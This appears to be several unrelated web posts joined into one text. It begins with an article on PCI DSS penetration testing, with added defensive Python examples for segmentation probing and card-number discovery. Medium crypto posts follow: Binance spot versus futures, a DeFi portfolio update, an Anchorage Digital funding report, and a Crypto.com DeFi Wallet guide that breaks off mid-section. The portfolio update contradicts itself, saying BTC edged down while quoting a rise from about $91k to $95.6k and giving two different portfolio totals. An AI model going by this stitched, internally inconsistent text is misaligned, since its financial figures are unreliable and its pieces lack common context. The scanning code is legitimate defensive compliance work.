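The "technical evidence" an assessor expects can be produced by a small test harness run from each non-CDE vantage point. The following is an added example, not code from the VISTA InfoSec article or any product it describes: it probes a documented allow-list and labels every path PASS, VIOLATION or DRIFT. The zone name, target addresses, ports and the allow-list itself are assumptions chosen for illustration; the probe is a plain TCP connect, so the script has to be run from the vantage point whose isolation you are claiming.

```python
"""Segmentation test harness: compare observed reachability from a vantage
point outside the CDE against the documented allow-list, and produce
per-rule evidence an assessor can read.

Added example, not code from the VISTA InfoSec article. Zone names, target
addresses, ports and the allow-list are assumptions for illustration.
"""
import socket
from dataclasses import dataclass
from typing import Callable, Iterable


@dataclass(frozen=True)
class Rule:
    src_zone: str        # vantage point the tester runs from, e.g. "corp-lan"
    dst_host: str        # CDE target
    dst_port: int
    expected_open: bool  # True only for a documented, approved path


def tcp_probe(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP handshake to host:port completes.

    A completed handshake means the segmentation control did not block the
    path; a timeout or RST means it did (or nothing is listening)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def evaluate(rules: Iterable[Rule], probe: Callable[[str, int], bool]) -> list[dict]:
    """Probe every rule and return one evidence record per rule.

    PASS      observed reachability matches the documented allow-list
    VIOLATION an undocumented path into the CDE is open (segmentation failed)
    DRIFT     an approved path is blocked (control changed without the docs)
    """
    evidence = []
    for r in rules:
        observed = probe(r.dst_host, r.dst_port)
        if observed == r.expected_open:
            status = "PASS"
        elif observed:
            status = "VIOLATION"
        else:
            status = "DRIFT"
        evidence.append({
            "src_zone": r.src_zone,
            "target": f"{r.dst_host}:{r.dst_port}",
            "expected_open": r.expected_open,
            "observed_open": observed,
            "status": status,
        })
    return evidence


def violations(evidence: list[dict]) -> list[dict]:
    """Only the records that disprove the segmentation claim."""
    return [e for e in evidence if e["status"] == "VIOLATION"]


# Assumed allow-list for a corporate-LAN vantage point (illustration only):
# the tokenization API on 443 is the single approved path; every other port
# into the CDE must be blocked.
ALLOW_LIST = [
    Rule("corp-lan", "10.10.1.10", 443, True),
    Rule("corp-lan", "10.10.1.10", 22, False),
    Rule("corp-lan", "10.10.1.20", 1433, False),
    Rule("corp-lan", "10.10.1.20", 3389, False),
]

if __name__ == "__main__":
    results = evaluate(ALLOW_LIST, tcp_probe)
    for rec in results:
        print(f'{rec["status"]:9} {rec["src_zone"]} -> {rec["target"]} '
              f'(expected open={rec["expected_open"]}, observed={rec["observed_open"]})')
    # Non-zero exit when any undocumented path is open, so the run can gate a pipeline.
    raise SystemExit(1 if violations(results) else 0)
```

VIOLATION records are the ones that disprove the segmentation assertion; DRIFT records mean an approved path has changed without the documentation following, which is exactly the evidence gap described above. Keep the run output with the test report and rerun it after any change to the segmentation controls.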
Refining PCI DSS Security Posture Through Testing
The general penetration test conducted against an organization’s PCI DSS posture therefore refines that posture through the discovery of vulnerabilities, weaknesses, flaws, and exploitable paths. Testing and validating the controls is the only reliable way to measure how effective an organization's PCI DSS security posture actually is.
Types of Penetration Tests Required by PCI DSS
| Test Type | What Is Tested | Why It Matters |
|---|---|---|
| Network penetration testing | External and internal network defenses | Identifies perimeter and lateral movement risks |
| Application penetration testing | Payment applications and APIs | Detects logic flaws, injection, and data exposure |
| Segmentation testing | Isolation between CDE and non-CDE systems | Confirms the scope reduction the CDE boundary relies on |
| Authentication testing | Access controls and privilege escalation | Prevents unauthorized access to card data |
Penetration Testing vs Vulnerability Scanning (PCI Context)
| Area | Vulnerability Scanning | Penetration Testing |
|---|---|---|
| Nature | Automated detection | Human-led exploitation |
| Depth | Identifies weaknesses | Proves real-world impact |
| Frequency | Quarterly (minimum) and after significant changes | At least annually and after significant changes |
| PCI Requirement | Req. 11.3 in v4.0 (11.2 in v3.2.1) | Req. 11.4 in v4.0 (11.3 in v3.2.1) |
| Outcome | Risk indicators | Confirmed security gaps |
Analogy: PCI DSS and Penetration Testing
Think of PCI DSS as the locks and safeguards a company places on its cardholder data. A penetration test is a guided, overseen and managed attempt to break those locks, so that vulnerabilities and flaws can be found and reported and the gaps closed. PCI DSS penetration testing validates real-world security controls by exercising the PCI DSS safeguards against realistic attack scenarios.
Evidence PCI Auditors Expect from Penetration Testing
| Evidence Item | What It Demonstrates |
|---|---|
| Scope definition | All relevant CDE systems were tested |
| Methodology | Industry-recognized testing approach used |
| Findings report | Identified vulnerabilities and exploit paths |
| Remediation evidence | Issues were fixed and verified |
| Retest results | Fixes are effective and durable |
Why Declared Compliance Is Not Enough
Even if a company says it follows PCI DSS, there may still be holes, misconfigurations, or paths an attacker could use to get in.
Common PCI DSS Penetration Testing Failures
| Failure | Why It Causes Audit Issues |
|---|---|
| Testing only externally | Internal threats are ignored |
| Excluding cloud components | Modern CDEs are hybrid |
| No segmentation testing | PCI scope cannot be trusted |
| No retesting after fixes | Control effectiveness is unproven |
| Generic reports | Lack of PCI-specific relevance |
Why PCI DSS 4 Leans So Heavily on Testing
Under older models, compliance was often point-in-time and evidence-heavy, and it was slow to adapt to real risk.
Who Is Responsible for PCI DSS Penetration Testing
| Role | Responsibility | Why It Matters |
|---|---|---|
| Executive management | Approves scope, budget, and remediation timelines | PCI DSS places accountability at the governance level, not just IT |
| Compliance / GRC team | Aligns testing with PCI DSS requirements and audit expectations | Ensures testing is evidence-ready, not just technically sound |
| Security team | Coordinates test execution and validates findings | Bridges technical results with business risk |
| External penetration testing provider | Conducts independent, qualified testing | Independence is required to ensure credibility and objectivity |
| System owners | Fix vulnerabilities and support retesting | Controls are only effective if remediation is verified |
| QSA / assessor | Reviews scope, results, and remediation evidence | Determines whether testing satisfies Requirement 11 |
Penetration Testing and the Shift Toward Effectiveness
Penetration testing fits this shift in emphasis. It forces differing implementations to converge toward real security, exposes implementations where PCI DSS controls look right on paper but fall short in behavior, and validates whether your security posture technically resists attack.
How PCI DSS 4.0 Changes Expectations for Penetration Testing
| Area | Pre–PCI DSS 4.0 Approach | PCI DSS 4.0 Expectation |
|---|---|---|
| Testing mindset | Point-in-time compliance | Continuous validation of control effectiveness |
| Change-driven testing | Often informal or delayed | Explicitly required after significant changes |
| Cloud environments | Frequently under-scoped | Fully in-scope if they impact the CDE |
| Segmentation validation | Sometimes assumed | Must be actively proven through testing |
| Evidence quality | High-level reports accepted | Clear exploit paths, impact, and verification required |
| Retesting | Sometimes skipped | Mandatory to confirm fixes are effective |
Objectives and Benefits of PCI Penetration Testing and Vulnerability Analysis
Every outcome of a penetration test should map back to the obligation to protect cardholder data. Vulnerability analysis aims to locate and identify the weaknesses, gaps, and exploitable conditions that could lead to loss of control over cardholder data.
Penetration testing and vulnerability analysis are not merely about ticking a compliance box; done properly, they deliver real practical benefits. First, they protect the cardholder data environment (CDE). A solid penetration test verifies that access to card data is actually restricted on a need-to-know basis, not merely on paper, and demonstrates that your systems, controls and processes protect cardholder data.
Another objective is to test segmentation across networked systems. Validating segmentation through penetration testing shows that your organization effectively limits access to the networks where cardholder data is stored, processed or transmitted, which also reduces the risk from insider threats. You’re proving that even if someone has access to part of the network, they can’t move laterally into systems that store, process, or transmit cardholder data.
Penetration testing also helps you identify common but high-impact web application vulnerabilities—things like SQL injection, broken authentication, and session management issues. These are exactly the kinds of weaknesses attackers look for, and PCI explicitly expects you to test them.
Being able to demonstrate that you regularly test your environment shows customers, partners, and your supply chain that you take data security seriously. That matters increasingly, especially when third-party risk is under scrutiny.
From a compliance standpoint, regular testing helps you maintain PCI DSS compliance over time, not just during audit season. It supports a more proactive security posture instead of reacting to findings once a year.
And finally, penetration testing is one of the most effective ways to uncover insecure configurations—across systems, networks, and applications—that might otherwise go unnoticed. These are often the exact issues that lead to audit findings or real-world breaches.
So overall, PCI testing isn’t just about passing an audit. It’s about proving that your controls actually work, in real conditions.
Insights from VISTA InfoSec – Cardholder Data Discovery Is About Preventing Silent Data Drift
At VISTA InfoSec, we were called in by a major enterprise that had experienced a data breach even though it was certified in PCI DSS. After due investigation, our consultants observed that the breached card data was residing on systems not in scope. This happened because cardholder data discovery was limited to systems already assumed to be in scope. This is an issue we have seen across multiple clients over the past 15 years. Our clients had previously overlooked data drift, where card data spread into non-card environments via logs, backups, integrations, or analytics workflows.
In one representative case, transaction payloads containing partial PAN data were logged by an application middleware layer and forwarded to a centralized logging and analytics platform classified as out of scope. Over time, those logs were backed up to shared storage and replicated across regions, creating multiple unintended copies of card data outside the defined CDE.
Cardholder data discovery isn’t just about scanning systems you already believe are in scope. It’s about making sure card data hasn’t quietly drifted somewhere it shouldn’t be. That’s why CHD scans need to cover both card and non-card environments. They help confirm that sensitive data hasn’t been duplicated, stored unencrypted, or left behind in unexpected places—and they’re critical for validating where card data really exists when you’re making ROC assertions.
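A discovery scan that reaches the log and analytics platforms has to tell real PANs apart from order numbers, trace IDs and already-masked values, and its own output must not become yet another copy of card data. The following is an added example, not code from the VISTA InfoSec article: a scanner that applies the issuer-prefix and Luhn filters discovery tools use and reports only a masked form. The log lines are constructed for illustration, using publicly documented test card numbers, and the source file name is an assumption.

```python
"""Cardholder data discovery over text sources such as application logs,
log-platform exports and backup extracts.

Added example, not code from the VISTA InfoSec article. The log lines are
constructed for illustration and use publicly documented test card numbers;
the issuer prefixes and Luhn check are the standard filters discovery tools
apply to separate real PANs from look-alike digit strings.
"""
import re
from dataclasses import dataclass
from typing import Iterable

# 13 to 19 digits, optionally split by single spaces or dashes, and not part
# of a longer digit run (so order IDs and timestamps glued to digits are skipped).
PAN_CANDIDATE = re.compile(r"(?<![0-9])(?:[0-9][ -]?){12,18}[0-9](?![0-9])")

# Issuer identification prefixes for the major brands; a candidate that does
# not start with one of these is not reported even if it passes Luhn.
IIN_PATTERNS = re.compile(
    r"^(?:4[0-9]{12}(?:[0-9]{3})?"                                          # Visa, 13 or 16 digits
    r"|5[1-5][0-9]{14}"                                                     # Mastercard 51-55
    r"|(?:222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}"  # Mastercard 2221-2720
    r"|3[47][0-9]{13}"                                                      # American Express
    r"|6(?:011|5[0-9]{2})[0-9]{12})$"                                       # Discover
)


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: every real PAN passes; most random digit runs fail."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep first six and last four, the most a report should ever show."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


@dataclass(frozen=True)
class Finding:
    source: str      # file or stream the PAN was found in
    line_no: int
    masked_pan: str  # never the full PAN: the report itself must not become CHD


def scan_lines(source: str, lines: Iterable[str]) -> list[Finding]:
    """Return one Finding per full PAN found; masked or truncated values are ignored."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in PAN_CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group(0))
            if IIN_PATTERNS.match(digits) and luhn_ok(digits):
                findings.append(Finding(source, n, mask(digits)))
    return findings


# Constructed sample of a middleware log that an "out of scope" analytics
# platform might ingest. Line 1 carries an order ID (fails Luhn), line 3 an
# already-masked PAN (not reported) and line 6 a trace ID (no digit run).
SAMPLE_LOG = """\
2026-01-16T10:01:02Z INFO order=1234567890123456 status=created
2026-01-16T10:01:03Z DEBUG payload={"card":"4111111111111111","exp":"12/27"}
2026-01-16T10:01:04Z INFO masked=411111******1111 auth=approved
2026-01-16T10:01:05Z DEBUG retry card=5555 5555 5555 4444 amt=19.99
2026-01-16T10:01:06Z DEBUG amex=378282246310005 cvv=[redacted]
2026-01-16T10:01:07Z INFO trace_id=8f0c4e2b-7d91-4b1f-9a10-3c5d2e1f0b7a
"""


def scan_sample() -> list[Finding]:
    """Run the scanner over the constructed log; source name is an assumption."""
    return scan_lines("middleware.log", SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f.source}:{f.line_no}  {f.masked_pan}")
```

Point the scanner at the same sources the article lists as drift targets (log platform exports, backup extracts, analytics staging tables), not only at the systems already in scope; every Finding outside the documented CDE is a scope assertion that the ROC cannot currently support.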
Conclusion
PCI DSS v4.0 addresses penetration testing in Requirement 11.4 (Requirement 11.3 in v3.2.1). Most companies hire an external firm, but the standard also allows a qualified internal resource to perform the test, provided the tester is organizationally independent of the systems under test; the tester does not have to be a QSA or an ASV. As part of compliance, penetration testing must occur at least once a year and after any significant change to your systems and technologies.
Companies often prefer extensive penetration testing and are well advised to agree the scope ahead of time with their QSA to improve their chances of meeting compliance. Penetration testing for PCI DSS helps maintain security posture, identify vulnerabilities, and ensure robust practices for keeping cardholder data secure.
Need Expertise for Implementing PCI DSS 4.0.1?
At VISTA InfoSec, we don’t just help you prepare for an audit—we help you build security that stands up to real-world attacks. As threats to PCI DSS environments become more automated and complex, organizations need more than checklists and templates. Whether your organization needs a PCI compliance security assessment to evaluate posture, a waiver requirement for avoiding a conflict of interest with your QSA for PCI DSS, or appropriate cardholder data environment penetration testing, we understand organizations’ requirements:
- They need experienced guidance, tested controls, and continuous assurance.
- Our certified experts work alongside your teams to clearly define scope, close compliance gaps, validate controls, and ensure you are audit-ready across people, processes, and technology.
- Continuous PCI Compliance testing
- PCI DSS cloud penetration testing
The result is not just PCI DSS 4.0.1 compliance, but a stronger, resilient cardholder data environment you can trust. Achieving continuous PCI compliance requires more than the right VAPT teams and collaboration; it needs vision and coherent approaches for your security posture and systems.
Want to learn more? Check out VISTA InfoSec’s YouTube Channel for simple explanations and expert guidance.
The post PCI DSS Penetration Testing Requirements Explained appeared first on Information Security Consulting Company - VISTA InfoSec.
Spot vs Futures on Binance: Where Should Smart Money Actually Trade?

Smart money doesn’t chase hype — it chooses structure, liquidity, and asymmetric risk. On Binance, that choice usually comes down to one critical decision: Spot trading or Futures trading?
Retail traders often frame this debate as simple — low risk vs high reward. Professionals know it’s far more nuanced. The real question isn’t which market is more profitable, but which market aligns with capital preservation, risk-adjusted returns, and scalable strategy execution.
In this in‑depth guide, we break down Spot vs Futures on Binance from the perspective of institutional traders, hedge funds, high‑net‑worth investors, and disciplined professionals — not gamblers.
By the end, you’ll know exactly where smart money actually trades, why, and how to position yourself accordingly.
Smart money uses both Spot and Futures on Binance — but for different objectives.
- Spot trading is preferred for long‑term accumulation, capital preservation, and directional conviction.
- Futures trading is used for hedging, short‑term alpha, volatility capture, and capital efficiency — not reckless leverage.
The edge comes from knowing when to use each market, not choosing only one.
Smart traders don’t rely on hype — they rely on frameworks. If you want more deep‑dive guides on Binance, crypto risk management, and professional‑grade trading strategies, follow this Medium profile now so you don’t miss the next article.
Understanding Binance Spot Trading
What Is Spot Trading on Binance?
Spot trading on Binance involves buying or selling cryptocurrencies at the current market price, with immediate ownership of the underlying asset. When you buy BTC on the spot market, you actually own BTC — no contracts, no expiry, no liquidation risk.
This is the most straightforward and transparent form of crypto trading, which is why it remains the foundation of most professional portfolios.
Key Features of Binance Spot Markets
- Real ownership of assets
- No leverage required
- No liquidation risk
- Simple fee structure
- Ideal for long‑term holding
Who Uses Spot Trading?
Spot markets attract:
- Long‑term investors
- Funds building core crypto exposure
- Family offices allocating to digital assets
- Traders with strong directional conviction
- Risk‑averse capital seeking asymmetric upside
For smart money, spot trading is about positioning, not excitement.
Advantages of Spot Trading (Why Smart Money Loves It)
1. No Liquidation Risk
One of the biggest advantages of spot trading is zero liquidation risk. Prices can move violently against you, but your position remains intact unless you choose to exit.
This is critical for professionals who prioritize survivability over short‑term performance.
2. Ideal for Long‑Term Conviction Trades
Smart money often identifies structural trends early — Layer 2 adoption, Bitcoin halvings, ETF inflows, DeFi primitives, or real‑world asset tokenization.
Spot markets allow them to:
- Accumulate gradually
- Ride multi‑year trends
- Ignore short‑term volatility
3. Simpler Risk Management
Risk is limited to the capital invested. There are no margin calls, funding rates, or forced liquidations to manage.
This simplicity is a feature, not a weakness.
4. Psychological Advantage
Spot traders experience far less emotional pressure than leveraged traders.
This leads to:
- Better decision‑making
- Less over‑trading
- More consistent execution
Smart money values emotional control as much as strategy.
Limitations of Spot Trading
Despite its strengths, spot trading isn’t perfect.
Capital Inefficiency
To generate meaningful returns, spot traders must deploy significant capital. A 20% move requires 100% capital exposure.
For institutions seeking capital efficiency, this can be a constraint.
Limited Short Opportunities
Spot markets make shorting difficult or impossible without borrowing assets, which adds complexity and counterparty risk.
This is where futures enter the conversation.
Pro Insight: Most traders lose money not because of bad markets — but because they choose the wrong tool.
Understanding Binance Futures Trading
What Are Binance Futures?
Binance Futures allows traders to speculate on the price of cryptocurrencies using derivative contracts rather than owning the underlying asset.
Key characteristics include:
- Ability to go long or short
- Use of leverage
- Funding rates
- Liquidation thresholds
Types of Binance Futures
- USDT‑Margined Futures (most popular)
- COIN‑Margined Futures
Smart money overwhelmingly prefers USDT‑margined perpetual futures due to liquidity and simplicity.
Why Smart Money Uses Futures (The Real Reasons)
Contrary to popular belief, professionals do not use futures primarily to gamble with high leverage.
1. Hedging Spot Exposure
One of the most common professional strategies is spot‑futures hedging.
Example:
- Long BTC in spot
- Short BTC perpetual futures during high volatility
This allows smart money to:
- Protect downside risk
- Lock in profits
- Reduce portfolio volatility
2. Capital Efficiency
Futures require far less capital than spot positions. This allows funds to:
- Deploy capital across multiple strategies
- Maintain liquidity
- Optimize returns on equity
3. Short‑Term Alpha Generation
Futures markets are ideal for:
- Range trading
- Breakout strategies
- Mean reversion
- Event‑driven trades
These strategies are difficult to execute efficiently on spot markets.
4. Market Neutral Strategies
Smart money often aims for delta‑neutral returns — profits regardless of market direction.
This is only possible with futures.
Risks of Futures Trading (Why Retail Traders Lose)
Liquidation Risk
Leverage magnifies both gains and losses. Poor risk management leads to forced liquidation — the #1 reason retail traders fail.
Funding Rate Costs
Holding futures positions during crowded trades can result in significant funding payments, silently eroding profits.
Emotional Overload
Leverage amplifies stress, leading to:
- Over‑trading
- Revenge trading
- Strategy abandonment
Smart money survives by avoiding these traps.
Spot vs Futures: Side‑by‑Side Comparison

Want the full smart‑money playbook? This article is part of a series focused on how professionals actually trade crypto — not what influencers sell.
Save this article so you can revisit these frameworks before your next trade.
Where Does Smart Money Actually Trade?
The honest answer: both — but strategically.
Smart Money Playbook
- Spot for core holdings and conviction trades
- Futures for risk management, tactical positioning, and volatility capture
They do not:
- Go all‑in on high leverage
- Trade emotionally
- Chase every move
They focus on risk‑adjusted returns, not screenshots.
Common Retail Mistakes to Avoid
- Using high leverage without a plan
- Trading futures without understanding funding rates
- Ignoring spot accumulation
- Over‑trading low‑quality setups
- Confusing luck with skill
Avoiding these mistakes immediately puts you ahead of 90% of traders.
How to Choose Between Spot and Futures
Ask yourself:
- Is my goal long‑term wealth or short‑term income?
- Can I emotionally handle leverage?
- Do I understand liquidation mechanics?
- Am I trading with a strategy or chasing price?
If unsure, start with spot.
Advanced Strategy: Combining Spot and Futures
Professionals often run hybrid strategies, such as:
- Spot accumulation + futures hedging
- Spot long‑term + futures scalping
- Spot portfolio + futures arbitrage
This layered approach reduces risk while maximizing opportunity.
Final Verdict: Spot vs Futures on Binance
Spot trading builds wealth. Futures trading manages and enhances it.
Smart money doesn’t choose sides — it chooses structure, discipline, and survivability.
If your goal is long‑term success rather than short‑term excitement, the path is clear:
- Build conviction in spot markets
- Use futures selectively
- Manage risk relentlessly
That’s where smart money actually trades.
If this guide helped sharpen your understanding of Spot vs Futures on Binance, do clap and save. Your future self will thank you before your next trade.
This isn’t content for gamblers.
It’s for traders who want to stay in the game long enough to win.
Spot vs Futures on Binance: Where Should Smart Money Actually Trade? was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.
4 more awesome (and practical) things you can do with a terminal on Android
Termux is an incredibly powerful terminal emulator for Android. I previously showed you how to use it to download any media file, convert files, or ssh into another device. However, that barely scratched the surface. Here are even more awesome things you can do with a terminal window on your phone.

Jan 2026 Portfolio Update: Stable 18–20% APY Amid BTC Consolidation
Mixed bag this week in crypto markets: BTC edged down slightly overall (from ~$91k to ~$95.6k), while altcoins like SUI (+20–31%) and XRP surged. Your portfolio (BTC, ETH, SUI, AERO, XRP) stayed positive on average, buoyed by SUI/XRP strength amid BTC stability around 95–97k. 📈

📊 Weekly Coin Movements
Portfolio benefited from altcoin rotation away from BTC dominance.
| Coin | Weekly Change/Volatility | Key Swings | Note |
|---|---|---|---|
| BTC | -0.58% to +5% | 91k → 97k USD | Stable, mild dip |
| ETH | -2% to +3% | 3,200–3,500 USD | Consolidation |
| SUI | +20–31% | 1.5 → 1.8–2 USD | Top winner 🚀 |
| AERO | Neutral | No big moves | Following alt trend |
| XRP | +21% | → 2.1 USD | BTC rotation play |
🔍 BTC Technical Analysis (Weekly)
Moderate bullish momentum emerging.
- RSI: 58 (neutral, not overbought).
- MACD: Mild positive histogram (upside potential).
- ADX: 28 (moderate trend strength).
- Trend: Upward above 90k support, rising volatility via Bollinger Bands.

📈 ETH & Altcoin Tech Breakdown
- ETH: RSI 42–45 (neutral/bearish), MACD sell (-111), Directional -16; upside if resistance breaks.
- SUI: Symmetrical triangle, $2 support key for bulls.
- AERO: Neutral indicators.
- XRP: Bullish Bollinger Bands, channel pattern — boosted by SEC ending Ripple appeal.
🌍 Key Global Crypto News
- Altcoins rotating (SUI +20%, TAO +16%); total market cap +$250B.
- SEC drops Ripple appeal — XRP relief rally.
- Canary Capital files for SUI ETF.
- BTC ETF outflows $680M; options expiry adds 90k volatility today.
🪙 Gold as Precious Metal
Gold in bearish correction toward $4,235 support post-ATH, eyeing rally above $5,165. RSI trendline backs upside amid geopolitics fueling long-term bull.

💼 My Portfolio Updates
DeFi portfolio grinding higher with minimal new capital.
- Bitpanda: Up to $1,055 (+$37, no new deposits). Heavy in gold/ETFs. BITPANDA
- VFAT: $847 (+$9), $10 rewards reinvested in ETH pools.
- KRYSTAL: $1,285 (flat), +$6 fees; closed dead position — shifting $90 to Beefy, now $1,195.
- GAMMASWAP: +$5 on Base/Arbitrum ETH volatility plays.
- PENDLE: Minimal gain; stable stake-to-maturity (testing phase).
- MOONWELL: +$30+, better LTV.
- AAVE: +$15, LTV down to 40.08% (safe zone).
- NAVI: Negligible balance/health factor lift.
- TURBOS: Flat, minimal fee rewards.
- CETUS: Flat balance, +$1 rewards (reinvesting); one vault +$20, another -$2, +$2 rewards.
- BEEFY: Core holding — compounding strong.
📊 Portfolio Summary Snapshot
| Metric | Value |
|---|---|
| Total Value | ~$8,550–8,650 USD |
| Concentration | BTC-derivs + BTC/USDC CLM |
| Weighted APY | ~18–20% annual |
| Yield Sources | Uniswap v3 BTC CLM, PancakeSwap vaults, Aerodrome vLP, Morpho/Beefy |
Yields stable from fees/compounding.
🔄 Week-over-Week Comparison
| Category | Last Week | Now | Change |
|---|---|---|---|
| Total Value | ~$8,700 | $8,927 | +$227 (+2.6%) |
| Est. Daily Yield | ~$3.7–4.0 | ~$3.8 | Stable |
| Accrued Yield (Lifetime) | ~$1,691 | $1,738 | +$47 net |
Notes: Growth from yields + mild BTC/ETH price lifts. Lower volatility, better range-resilience. Risk down, IL pressure eased. Subjective score: 8.2/10 (up from 7.5).
🧾 Quick Conclusion
Portfolio up ~2.6% in a week, holding steady daily cashflow (~$3.8). APY isn’t sky-high, but structure is mature, less volatile, and sustainable — less action, more results.
🧠 Final Take:
- ❌ No strategy issues.
- ❌ Beefy autocompound flawless.
- ✅ Time + volume will scale it.
- 👉 HODL portfolio: Real fees, controlled risk, gradual growth — no bridging frenzy.
- Daily yield dips? Normal. Healthy structure wins in DeFi. Liquidity outlasts high-APY chasers.
Thoughts on SUI ETF buzz or XRP’s win? Comment below! 👇
⚠️ Disclaimer
🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑
Disclaimer:
This post is just my personal opinion and ideas. I am not promoting or recommending any cryptocurrency or investment. Please do your own research and be careful when investing. Any decisions you make are at your own risk.
🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑
💼 Jan 2026 Portfolio Update: Stable 18–20% APY Amid BTC Consolidation was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.
Canaan risks Nasdaq delisting as shares trade below $1 for the second time in a year
Crypto Bank Anchorage Digital Targets $400M Funding Ahead Of IPO
Anchorage Digital, a New York–based crypto bank, is moving to raise fresh capital as it prepares to enter public markets. According to Bloomberg, people familiar with the matter say the firm is looking to secure between $200 million and $400 million in new funding.
Anchorage Seeks Major Funding
Reports say the firm is exploring a $200 million–$400 million round to strengthen its business before a possible public listing. The plan would put Anchorage among a small group of crypto-native companies that have tried to list on stock markets after building regulated services for institutions.
The company’s bank affiliate holds a federal charter, a status that gives it a different footing compared with many crypto firms. That federal backing is often cited by investors as a reason Anchorage can offer custody and other services seen as safer by big clients.
Based on reports, Anchorage last raised capital in a previous round that valued the business at over $3 billion, and the fresh funding is viewed as a runway toward a public debut.
Anchorage Digital, whose affiliate is the first federally chartered US digital-asset bank, is seeking to raise fresh capital as it explores a potential public listing, according to people with knowledge of the matter https://t.co/6xLNEJN54W
— Bloomberg (@business) January 16, 2026
Regulatory Edge And Product Push
Some reports say the bank is also growing teams tied to stablecoin work and exploring partnerships that would widen its product set for large customers. These moves appear aimed at making the company more attractive to public investors.
Market observers note that crypto firms have been considering public listings more often as regulation clears up in certain areas and as institutional demand for custody and regulated rails grows.
Anchorage’s timing comes while other custody and asset firms weigh similar steps, a trend that could reshape how big investors access crypto services. The atmosphere is cautious, but there is clear interest in regulated players.
Market Reaction And IPO Timing
According to market chatter, the bank could seek a listing as soon as next year, although some coverage says 2027 is also possible. Sources quoted by Bloomberg gave a range of potential timing, and Anchorage has not provided a public comment on the plans.
If Anchorage completes a successful raise and goes public, the event would signal confidence in firms that combine crypto services with bank-style oversight.
Investors will be watching how the company uses the proceeds — whether to build new products, hire staff, or boost its balance sheet ahead of scrutiny that comes with public ownership. The next few months are likely to reveal more details as underwriting and investor talks advance.
Featured image from Yellow, chart from TradingView

Step-by-Step: How to Use Crypto.com’s DeFi Wallet for Passive Income

What if your crypto could work for you — 24/7 — without relying on banks, brokers, or savings accounts that barely beat inflation?
In a world where traditional interest rates struggle to keep up with rising living costs, decentralized finance (DeFi) has emerged as a powerful alternative for investors seeking passive income, portfolio diversification, and long-term wealth building.
One of the most beginner-friendly yet powerful gateways into this ecosystem is Crypto.com’s DeFi Wallet.
Unlike centralized platforms that control your funds, Crypto.com DeFi Wallet gives you full ownership of your assets, while still offering access to staking, yield farming, liquidity pools, and on-chain rewards — all from a single mobile interface.
In this step-by-step guide, you’ll learn exactly how to use Crypto.com’s DeFi Wallet to generate passive income, even if you’re new to DeFi. We’ll cover setup, security, earning strategies, risk management, and how to maximize yields responsibly.
Whether your goal is earning yield on idle crypto, reducing reliance on traditional debt-based systems, or building decentralized income streams, this guide is designed to help you do it safely and strategically.
What Is Crypto.com’s DeFi Wallet?
Crypto.com’s DeFi Wallet is a non-custodial cryptocurrency wallet that allows users to earn passive income through staking, DeFi lending, liquidity pools, and yield protocols while maintaining full control of their private keys.
Key Features of Crypto.com’s DeFi Wallet
- Self-custody (you own your keys, not Crypto.com)
- Supports Ethereum, Cronos, Polygon, BNB Chain, Cosmos, and more
- Access to staking, DeFi apps (dApps), and yield protocols
- Seamless connection to the Crypto.com App
- Built-in Web3 browser for DeFi access
Unlike centralized platforms, the wallet connects directly to decentralized finance applications (dApps), enabling on-chain rewards without intermediaries.
Building passive income with crypto is a skill — not a gamble.
Follow this publication to learn how professionals use DeFi, staking, and yield strategies to grow income, protect capital, and reduce reliance on traditional banks — without falling for hype or scams.
Can You Earn Passive Income With Crypto.com’s DeFi Wallet?
Yes, Crypto.com’s DeFi Wallet allows users to earn passive income by staking CRO, earning yield on stablecoins, providing liquidity to DeFi pools, and lending crypto assets through decentralized protocols — all while retaining self-custody.
Returns vary based on market conditions and protocol risk.
Why Use a DeFi Wallet for Passive Income?
Traditional savings accounts often offer negative real returns after inflation. DeFi flips this model by allowing users to earn yield directly from blockchain activity.
Benefits of DeFi Passive Income:
- Higher yield potential than banks
- No minimum balances
- Permissionless access
- Global, borderless income streams
- Transparency via smart contracts
Crypto.com’s DeFi Wallet acts as a bridge between beginners and advanced DeFi strategies, making it ideal for investors who want passive income without unnecessary complexity.
Step 1: Download and Set Up Crypto.com’s DeFi Wallet
1. Download the Wallet
- Available on iOS and Android
- Search for “Crypto.com DeFi Wallet”
- Ensure the listed developer is Crypto.com, not a look-alike, before installing
2. Create a New Wallet
- Select “Create New Wallet”
- You’ll receive a 12-word recovery phrase
- Write it down offline (never store digitally)
Important Security Note:
Your recovery phrase is your money. Lose it, and your funds are gone forever.
3. Enable Security Settings
- Set a strong passcode
- Enable biometric authentication
- Turn on transaction confirmations
Step 2: Fund Your DeFi Wallet
To earn passive income, you need assets inside your wallet.
Funding Options:
- Transfer crypto from Crypto.com App
- Send crypto from another wallet
- Bridge assets from other chains
Popular assets for passive income:
- CRO
- ETH
- USDC
- ATOM
- MATIC
Each asset offers different yield opportunities, risk levels, and lock-up terms.
Step 3: Understand the Passive Income Options Inside the DeFi Wallet
Crypto.com’s DeFi Wallet supports multiple income-generating strategies, each with different risk-reward profiles.
What Are the Best Passive Income Strategies in Crypto.com’s DeFi Wallet?
The most popular passive income methods include:
- CRO staking
- Stablecoin yield farming
- Liquidity pool participation
- DeFi lending protocols
Each strategy offers different risk levels, yield potential, and liquidity conditions.
Strategy 1: CRO Staking (Beginner-Friendly)
How CRO Staking Works
By staking CRO, you help secure the Cronos network and earn staking rewards in return.
Why CRO Staking Is Popular:
- Predictable yields
- No active management
- On-chain transparency
- Ideal for long-term holders
Step-by-Step CRO Staking:
